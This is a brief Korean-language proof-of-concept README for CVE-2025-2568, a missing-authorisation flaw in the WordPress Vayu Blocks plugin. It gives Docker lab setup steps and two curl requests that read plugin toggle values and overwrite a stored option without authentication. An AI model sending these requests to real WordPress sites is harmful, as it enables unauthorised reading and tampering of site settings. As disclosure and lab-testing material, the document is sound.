
CVE-2025-2568에 대한 개념 증명 익스플로잇으로, 누락된 권한 검사로 인해 WordPress Vayu Blocks 플러그인 옵션에 대한 무단 액세스 및 수정을 시연합니다.
WordPress 및 WooCommerce용 Vayu Blocks – Gutenberg Blocks 플러그인은 1.0.4부터 1.2.1까지의 버전에서 vayu_blocks_get_toggle_switch_values_callback 및 vayu_blocks_save_toggle_switch_callback 함수에 기능 검사가 누락되어 무단 액세스 및 데이터 수정에 취약합니다. 이로 인해 인증되지 않은 공격자가 플러그인 옵션을 읽고 _value로 끝나는 키 이름을 가진 모든 옵션을 업데이트할 수 있습니다.
cd vuln-wordpress
docker-compose up -d
cd wp-content/plugins/
unzip vayu-blocks.1.2.0.zip
curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
-H "Content-Type: application/json" \
-d '{"key":"container", "value":"new_value"}'